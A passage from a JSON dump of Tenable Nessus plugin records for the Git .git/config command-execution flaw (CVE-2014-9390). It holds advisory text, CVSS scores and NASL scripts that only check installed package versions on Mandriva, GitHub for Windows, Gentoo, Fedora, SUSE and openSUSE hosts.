value:\"p-cpe:/a:mandriva:linux:gitweb\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64git-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:perl-Git\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandriva:business_server:2\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/03/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/03/30\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2019 Tenable Network Security, Inc.\");\n script_family(english:\"Mandriva Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/Mandrake/release\", \"Host/Mandrake/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Mandrake/release\")) audit(AUDIT_OS_NOT, \"Mandriva / Mandake Linux\");\nif (!get_kb_item(\"Host/Mandrake/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^(amd64|i[3-6]86|x86_64)$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Mandriva / Mandrake Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"MDK-MBS2\", cpu:\"x86_64\", reference:\"git-1.8.5.6-1.mbs2\")) flag++;\nif (rpm_check(release:\"MDK-MBS2\", cpu:\"x86_64\", reference:\"git-arch-1.8.5.6-1.mbs2\")) flag++;\nif (rpm_check(release:\"MDK-MBS2\", cpu:\"x86_64\", reference:\"git-core-1.8.5.6-1.mbs2\")) flag++;\nif (rpm_check(release:\"MDK-MBS2\", cpu:\"x86_64\", reference:\"git-core-oldies-1.8.5.6-1.mbs2\")) flag++;\nif (rpm_check(release:\"MDK-MBS2\", cpu:\"x86_64\", reference:\"git-cvs-1.8.5.6-1.mbs2\")) flag++;\nif 
(rpm_check(release:\"MDK-MBS2\", cpu:\"x86_64\", reference:\"git-email-1.8.5.6-1.mbs2\")) flag++;\nif (rpm_check(release:\"MDK-MBS2\", cpu:\"x86_64\", reference:\"git-prompt-1.8.5.6-1.mbs2\")) flag++;\nif (rpm_check(release:\"MDK-MBS2\", cpu:\"x86_64\", reference:\"git-svn-1.8.5.6-1.mbs2\")) flag++;\nif (rpm_check(release:\"MDK-MBS2\", cpu:\"x86_64\", reference:\"gitk-1.8.5.6-1.mbs2\")) flag++;\nif (rpm_check(release:\"MDK-MBS2\", cpu:\"x86_64\", reference:\"gitview-1.8.5.6-1.mbs2\")) flag++;\nif (rpm_check(release:\"MDK-MBS2\", cpu:\"x86_64\", reference:\"gitweb-1.8.5.6-1.mbs2\")) flag++;\nif (rpm_check(release:\"MDK-MBS2\", cpu:\"x86_64\", reference:\"lib64git-devel-1.8.5.6-1.mbs2\")) flag++;\nif (rpm_check(release:\"MDK-MBS2\", cpu:\"x86_64\", reference:\"perl-Git-1.8.5.6-1.mbs2\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-01T03:03:30", "description": "The version of GitHub for Windows installed on the remote host is\nprior to 2.6.5. It is, therefore, affected by a command execution\nvulnerability when processing specially crafted git trees in a\ncase-insensitive or case-normalizing file system. 
A remote attacker,\nusing a specially crafted git tree, can overwrite a user's\n'.git/config' file when the user clones or checks out a repository,\nallowing arbitrary command execution.", "edition": 16, "published": "2014-12-22T00:00:00", "title": "GitHub for Windows < 2.6.5 .git/config Command Execution", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-9390"], "modified": "2021-01-02T00:00:00", "cpe": ["cpe:/a:github:github", "cpe:/a:git:git"], "id": "GITHUB_WIN_RCE.NASL", "href": "https://www.tenable.com/plugins/nessus/80202", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(80202);\n script_version(\"1.10\");\n script_cvs_date(\"Date: 2018/11/15 20:50:26\");\n\n script_cve_id(\"CVE-2014-9390\");\n script_bugtraq_id(71732);\n\n script_name(english:\"GitHub for Windows < 2.6.5 .git/config Command Execution\");\n script_summary(english:\"Checks the version of GitHub.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host has an application installed that is affected\nby a command execution vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of GitHub for Windows installed on the remote host is\nprior to 2.6.5. It is, therefore, affected by a command execution\nvulnerability when processing specially crafted git trees in a\ncase-insensitive or case-normalizing file system. 
A remote attacker,\nusing a specially crafted git tree, can overwrite a user's\n'.git/config' file when the user clones or checks out a repository,\nallowing arbitrary command execution.\");\n # https://github.com/blog/1938-vulnerability-announced-update-your-git-clients\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?ad68bb83\");\n script_set_attribute(attribute:\"see_also\", value:\"https://desktop.github.com/\");\n script_set_attribute(attribute:\"see_also\", value:\"http://article.gmane.org/gmane.linux.kernel/1853266\");\n # http://git-blame.blogspot.com/2014/12/git-1856-195-205-214-and-221-and.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?afc47628\");\n script_set_attribute(attribute:\"solution\", value:\"Upgrade to GitHub for Windows 2.6.5 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Malicious Git and Mercurial HTTP Server For CVE-2014-9390');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/12/18\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/12/18\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/12/22\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:github:github\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:git:git\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_end_attributes();\n\n 
script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"github_win_installed.nbin\");\n script_require_keys(\"installed_sw/GitHub for Windows\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"install_func.inc\");\n\nappname = \"GitHub for Windows\";\n\ninstall = get_single_install(app_name:appname);\n\nversion = install['version'];\npath = install['path'];\n\nif (ver_compare(ver:version, fix:'2.6.5', strict:FALSE) < 0)\n{\n port = get_kb_item(\"SMB/transport\");\n if (!port) port = 445;\n\n if (report_verbosity > 0)\n {\n report +=\n '\\n Path : ' + path +\n '\\n Installed version : ' + version +\n '\\n Fixed version : 2.6.5.0\\n';\n security_warning(port:port, extra:report);\n }\n else security_warning(port);\n}\nelse audit(AUDIT_INST_PATH_NOT_VULN, appname, version, path);\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-12T11:04:45", "description": "The remote host is affected by the vulnerability described in GLSA-201509-06\n(Git: Arbitrary command execution)\n\n A vulnerability in Git causing Git-compatible clients that access\n case-insensitive or case-normalizing filesystems to overwrite the\n .git/config when cloning or checking out a repository, leading to\n execution of arbitrary commands.\n \nImpact :\n\n An attacker can execute arbitrary commands on a client machine that\n clones a crafted malicious Git tree.\n \nWorkaround :\n\n There is no known workaround at this time.", "edition": 12, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2015-09-25T00:00:00", "title": "GLSA-201509-06 : Git: Arbitrary command execution", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-9390"], "modified": "2015-09-25T00:00:00", "cpe": 
["p-cpe:/a:gentoo:linux:git", "cpe:/o:gentoo:linux"], "id": "GENTOO_GLSA-201509-06.NASL", "href": "https://www.tenable.com/plugins/nessus/86137", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Gentoo Linux Security Advisory GLSA 201509-06.\n#\n# The advisory text is Copyright (C) 2001-2020 Gentoo Foundation, Inc.\n# and licensed under the Creative Commons - Attribution / Share Alike \n# license. See http://creativecommons.org/licenses/by-sa/3.0/\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(86137);\n script_version(\"2.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2014-9390\");\n script_xref(name:\"GLSA\", value:\"201509-06\");\n\n script_name(english:\"GLSA-201509-06 : Git: Arbitrary command execution\");\n script_summary(english:\"Checks for updated package(s) in /var/db/pkg\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Gentoo host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote host is affected by the vulnerability described in GLSA-201509-06\n(Git: Arbitrary command execution)\n\n A vulnerability in Git causing Git-compatible clients that access\n case-insensitive or case-normalizing filesystems to overwrite the\n .git/config when cloning or checking out a repository, leading to\n execution of arbitrary commands.\n \nImpact :\n\n An attacker can execute arbitrary commands on a client machine that\n clones a crafted malicious Git tree.\n \nWorkaround :\n\n There is no known workaround at this time.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security.gentoo.org/glsa/201509-06\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"All Git 1.8.x users should 
upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=dev-vcs/git-1.8.5.6'\n All Git 1.9.x users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=dev-vcs/git-1.9.5'\n All Git 2.0.x users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=dev-vcs/git-2.0.5'\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Malicious Git and Mercurial HTTP Server For CVE-2014-9390');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:git\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:gentoo:linux\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/02/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/09/24\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/09/25\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Gentoo Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Gentoo/release\", \"Host/Gentoo/qpkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"qpkg.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Gentoo/release\")) audit(AUDIT_OS_NOT, \"Gentoo\");\nif (!get_kb_item(\"Host/Gentoo/qpkg-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (qpkg_check(package:\"dev-vcs/git\", unaffected:make_list(\"rge 1.8.5.6\", \"rge 1.9.5\", \"ge 2.0.5\"), vulnerable:make_list(\"lt 2.0.5\"))) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:qpkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = qpkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"Git\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-12T10:12:26", "description": "Fixes for CVE-2014-9390\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 12, "published": "2014-12-30T00:00:00", "title": "Fedora 21 : eclipse-egit-3.5.3-1.fc21 / eclipse-jgit-3.5.3-1.fc21 (2014-17341)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-9390"], "modified": "2014-12-30T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:eclipse-egit", "cpe:/o:fedoraproject:fedora:21", "p-cpe:/a:fedoraproject:fedora:eclipse-jgit"], "id": "FEDORA_2014-17341.NASL", "href": "https://www.tenable.com/plugins/nessus/80298", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2014-17341.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(80298);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_bugtraq_id(71732);\n script_xref(name:\"FEDORA\", value:\"2014-17341\");\n\n script_name(english:\"Fedora 21 : eclipse-egit-3.5.3-1.fc21 / eclipse-jgit-3.5.3-1.fc21 (2014-17341)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Fixes for CVE-2014-9390\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2014-December/147192.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?d40e2840\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2014-December/147193.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?b671553c\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected eclipse-egit and / or eclipse-jgit packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:H/Au:N/C:P/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:eclipse-egit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:eclipse-jgit\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:21\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/12/20\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/12/30\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^21([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 21.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC21\", reference:\"eclipse-egit-3.5.3-1.fc21\")) flag++;\nif (rpm_check(release:\"FC21\", reference:\"eclipse-jgit-3.5.3-1.fc21\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"eclipse-egit / eclipse-jgit\");\n}\n", "cvss": {"score": 4.0, "vector": "AV:N/AC:H/Au:N/C:P/I:P/A:N"}}, {"lastseen": "2021-01-07T14:22:20", "description": "This update fixes the following security issue :\n\n - CVE-2014-9390: arbitrary command execution vulnerability\n on case- insensitive file system (bnc#910756)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE 
security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 14, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2015-05-20T00:00:00", "title": "SUSE SLES12 Security Update : git (SUSE-SU-2015:0100-1)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-9390"], "modified": "2015-05-20T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:git-core-debuginfo", "cpe:/o:novell:suse_linux:12", "p-cpe:/a:novell:suse_linux:git-debugsource", "p-cpe:/a:novell:suse_linux:git-core"], "id": "SUSE_SU-2015-0100-1.NASL", "href": "https://www.tenable.com/plugins/nessus/83671", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2015:0100-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(83671);\n script_version(\"2.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2014-9390\");\n script_bugtraq_id(71732);\n\n script_name(english:\"SUSE SLES12 Security Update : git (SUSE-SU-2015:0100-1)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SUSE host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update fixes the following security issue :\n\n - CVE-2014-9390: arbitrary command execution vulnerability\n on case- insensitive file system (bnc#910756)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=910756\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2014-9390/\"\n );\n # https://www.suse.com/support/update/announcement/2015/suse-su-20150100-1.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?9da29764\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"To install this SUSE Security Update use YaST online_update.\nAlternatively you can run the command listed for your product :\n\nSUSE Linux Enterprise Software Development Kit 12 :\n\nzypper in -t patch SUSE-SLE-SDK-12-2015-37\n\nSUSE Linux Enterprise Server 12 :\n\nzypper in -t patch SUSE-SLE-SERVER-12-2015-37\n\nTo bring your system up-to-date, use 'zypper patch'.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Malicious Git and Mercurial HTTP Server For CVE-2014-9390');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:git-core\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:git-core-debuginfo\");\n 
script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:git-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:12\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/02/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/01/21\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/05/20\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLES12)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLES12\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES12\" && (! 
preg(pattern:\"^(0)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES12 SP0\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"git-core-1.8.5.6-5.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"git-core-debuginfo-1.8.5.6-5.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"git-debugsource-1.8.5.6-5.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"git\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-06-05T11:12:26", "description": "The git web frontend cgit was updated to 0.11.2 to fix security issues\nand bugs.\n\nThe following vulnerabilities were fixed :\n\n - CVE-2014-9390: arbitrary command execution vulnerability\n on case-insensitive file systems in git. 
Malicious\n commits could affect client users on all platforms using\n case-insensitive file systems when using vulnerable git\n versions.\n\nIn addition cgit was updated to 0.11.2 with minor improvements and bug\nfixes.\n\nThe embedded git version was updated to 2.4.3.", "edition": 12, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2015-06-23T00:00:00", "title": "openSUSE Security Update : cgit (openSUSE-2015-436)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-9390"], "modified": "2015-06-23T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:cgit-debugsource", "p-cpe:/a:novell:opensuse:cgit-debuginfo", "p-cpe:/a:novell:opensuse:cgit", "cpe:/o:novell:opensuse:13.2", "cpe:/o:novell:opensuse:13.1"], "id": "OPENSUSE-2015-436.NASL", "href": "https://www.tenable.com/plugins/nessus/84335", "sourceData": "#%NASL_MIN_LEVEL 80502\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2015-436.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(84335);\n script_version(\"2.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/06/04\");\n\n script_cve_id(\"CVE-2014-9390\");\n\n script_name(english:\"openSUSE Security Update : cgit (openSUSE-2015-436)\");\n script_summary(english:\"Check for the openSUSE-2015-436 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The git web frontend cgit was updated to 0.11.2 to fix security issues\nand bugs.\n\nThe following vulnerabilities were fixed :\n\n - CVE-2014-9390: arbitrary command execution vulnerability\n on case-insensitive file systems in git. 
Malicious\n commits could affect client users on all platforms using\n case-insensitive file systems when using vulnerable git\n versions.\n\nIn addition cgit was updated to 0.11.2 with minor improvements and bug\nfixes.\n\nThe embedded git version was updated to 2.4.3.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=910756\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected cgit packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Malicious Git and Mercurial HTTP Server For CVE-2014-9390');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:cgit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:cgit-debuginfo\");\n script_set_attribute(attribute:\"cpe\", 